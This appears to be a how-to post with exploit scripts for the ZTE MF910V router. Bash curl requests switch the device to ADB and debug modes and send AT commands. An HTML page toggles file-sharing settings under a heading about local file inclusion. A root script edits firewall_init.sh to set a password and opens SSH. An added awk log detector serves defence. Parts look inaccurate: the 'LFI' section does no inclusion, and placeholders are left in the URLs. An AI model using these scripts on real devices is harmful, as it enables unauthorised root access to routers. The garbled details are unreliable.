Telstra ZteMF910/v Exploit Scripts


To utilize the exploits on the ZTE MF910V router, we will create a set of scripts in bash and HTML. These scripts will allow us to perform mode switching, enable ADB, execute AT commands, enable debug mode, exploit LFI, and gain root access. Let's go through each exploit and the corresponding scripts required.

Mode Switching and Enabling ADB

To perform mode switching and enable ADB on the ZTE MF910V router, we need to send HTTP requests to specific endpoints. We can achieve this using a bash script. Here's an example:

```bash
#!/bin/bash

# Mode Switching
MODE_SWITCH_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X"
MODE_SWITCH_VALUE="1" # Change X to 0 or 1
curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable=$MODE_SWITCH_VALUE" "$MODE_SWITCH_URL"

# Enabling ADB
ADB_ENABLE_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=X"
ADB_ENABLE_VALUE="6" # Change X to the desired mode (1-4 for RNDIS, 5 for CDC, 6 for ADB)
curl -s -X POST -d "goformId=USB_MODE_SWITCH&usb_mode=$ADB_ENABLE_VALUE" "$ADB_ENABLE_URL"
```

Save the above script as mode_switch.sh and execute it using bash mode_switch.sh. This will perform mode switching and enable ADB on the router.

Executing AT Commands and Enabling Debug Mode

To execute AT commands and enable debug mode on the ZTE MF910V router, we can use the same approach as the bash script above, with the URLs and values changed accordingly. Here's an example:

```bash
#!/bin/bash

# Executing AT Commands
AT_COMMANDS_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=AT_COMMAND&command=AT+COMMAND_HERE"
curl -s -X POST -d "goformId=AT_COMMAND&command=AT+COMMAND_HERE" "$AT_COMMANDS_URL"

# Enabling Debug Mode
DEBUG_ENABLE_URL="http://192.168.0.1/goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X"
DEBUG_ENABLE_VALUE="1" # Change X to 0 or 1
curl -s -X POST -d "goformId=SET_DEVICE_MODE&debug_enable=$DEBUG_ENABLE_VALUE" "$DEBUG_ENABLE_URL"
```

Save the above script as at_commands.sh and execute it using bash at_commands.sh. This will execute AT commands and enable debug mode on the router.

Exploiting LFI (Local File Inclusion)

To exploit the LFI vulnerability on the ZTE MF910V router, we need to modify certain files and uncomment specific functions. We can achieve this by creating an HTML file that makes the necessary changes. Here's an example:

```html
<!DOCTYPE html>
<html>
<head>
<script>
function enableSDCard() {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=sd_card_state&cfg_value=1", true);
  xhr.send();
}

function enableHttpShare() {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=httpshare_guest&cfg_value=1", true);
  xhr.send();
}

function enableSDCardMenu() {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=sd&cfg_value=1", true);
  xhr.send();
}

function enableSDCardFileViewer() {
  var xhr = new XMLHttpRequest();
  xhr.open("GET", "/goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=httpshare&cfg_value=1", true);
  xhr.send();
}
</script>
</head>
<body>
  <button onclick="enableSDCard()">Enable SD Card</button>
  <button onclick="enableHttpShare()">Enable HTTP Share</button>
  <button onclick="enableSDCardMenu()">Enable SD Card Menu</button>
  <button onclick="enableSDCardFileViewer()">Enable SD Card File Viewer</button>
</body>
</html>
```

Save the above code as exploit.html and open it in a web browser. Clicking on the buttons will send the necessary HTTP requests to enable the corresponding features.
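For the defensive side, one way to spot the requests from the three sections above in HTTP logs, as an added example that is not part of the original post. The log format, the sample lines and the function name `detect_goform` are assumptions; the `goformId` values are the ones used on this page.

```shell
#!/bin/bash
# Added example (not from the original post): report requests that use the
# goformId values shown on this page. Assumed log format, one request per line:
#   <time> <client> <method> <url> <post-body or "-">
detect_goform() {
  awk '
    BEGIN {
      n = split("SET_DEVICE_MODE USB_MODE_SWITCH AT_COMMAND CFG_SET", ids, " ")
      for (i = 1; i <= n; i++) watched[ids[i]] = 1
    }
    index($4, "/goform/goform_set_cmd_process") == 0 { next }
    {
      # Parse the query string, then the POST body, so body values overwrite
      # the "X" placeholder the scripts leave in the URL (assumed precedence).
      qs = $4
      sub(/^[^?]*[?]?/, "", qs)
      if ($5 != "" && $5 != "-") qs = qs "&" $5
      split("", p)                       # portable way to clear an array
      m = split(qs, kv, "&")
      for (i = 1; i <= m; i++) {
        eq = index(kv[i], "=")
        if (eq > 0) p[substr(kv[i], 1, eq - 1)] = substr(kv[i], eq + 1)
      }
      id = p["goformId"]
      if (!(id in watched)) next
      if (id == "SET_DEVICE_MODE")      d = "debug_enable=" p["debug_enable"]
      else if (id == "USB_MODE_SWITCH") d = "usb_mode=" p["usb_mode"]
      else if (id == "AT_COMMAND")      d = "command=" p["command"]
      else                              d = p["cfg_key"] "=" p["cfg_value"]
      printf "%s %s %s %s\n", $2, $3, id, d
    }
  '
}

# Constructed sample lines (not captured from a real device).
LOG_SAMPLE='2024-01-01T10:00:01 192.168.0.50 POST /goform/goform_set_cmd_process?goformId=USB_MODE_SWITCH&usb_mode=X goformId=USB_MODE_SWITCH&usb_mode=6
2024-01-01T10:00:02 192.168.0.50 GET /goform/goform_set_cmd_process?goformId=CFG_SET&cfg_key=httpshare_guest&cfg_value=1 -
2024-01-01T10:00:03 192.168.0.51 GET /index.html -
2024-01-01T10:00:04 192.168.0.51 GET /goform/goform_set_cmd_process?goformId=PLACEHOLDER_OTHER -
2024-01-01T10:00:05 192.168.0.50 POST /goform/goform_set_cmd_process?goformId=SET_DEVICE_MODE&debug_enable=X goformId=SET_DEVICE_MODE&debug_enable=1'

printf '%s\n' "$LOG_SAMPLE" | detect_goform
```

Each output line gives the client, the HTTP method, the `goformId` and the value that was set, so a change to debug mode, USB mode or the HTTP share settings can be traced to the host that requested it.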

Gaining Root Access

To gain root access on the ZTE MF910V router, we need to modify certain files and execute specific commands. We can achieve this by creating a bash script. Here's an example:

```bash
#!/bin/bash

# Modify firewall_init.sh
sed -i '92,93s/^/#/' /usr/zte/zte_conf/scripts/firewall_init.sh
echo -e "echo 'password\npassword\n' | passwd" >> /usr/zte/zte_conf/scripts/firewall_init.sh

# Enable SSH
iptables -t filter -I INPUT -p tcp --dport 22 -j ACCEPT
iptables -t filter -I INPUT -p udp --dport 22 -j ACCEPT

# Reboot the device
reboot
```

Save the above script as root_access.sh and execute it using bash root_access.sh. This will modify the necessary files, enable SSH, and reboot the device. After the reboot, you can SSH into the router using the specified username and password.
